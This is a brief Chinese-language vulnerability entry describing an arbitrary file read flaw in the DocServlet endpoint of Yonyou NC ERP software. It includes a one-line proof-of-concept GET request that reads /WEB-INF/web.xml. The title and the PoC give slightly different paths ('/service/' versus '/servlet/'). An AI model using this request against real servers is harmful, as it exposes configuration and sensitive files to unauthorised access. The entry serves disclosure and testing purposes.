漏洞描述
用友NC是一款企业级ERP软件,提供了一系列业务管理模块,包括财务会计、采购管理、销售管理等。该漏洞存在于用友NC的DocServlet接口,攻击者可以通过构造恶意请求读取服务器上的任意文件,可能导致敏感信息泄露和系统安全性降低。
用友NC /service/~webrt/nc.uap.lfw.file.action.DocServlet 文件读取漏洞
PoC代码
GET /servlet/~webrt/nc.uap.lfw.file.action.DocServlet?disp=/WEB-INF/web.xml HTTP/1.1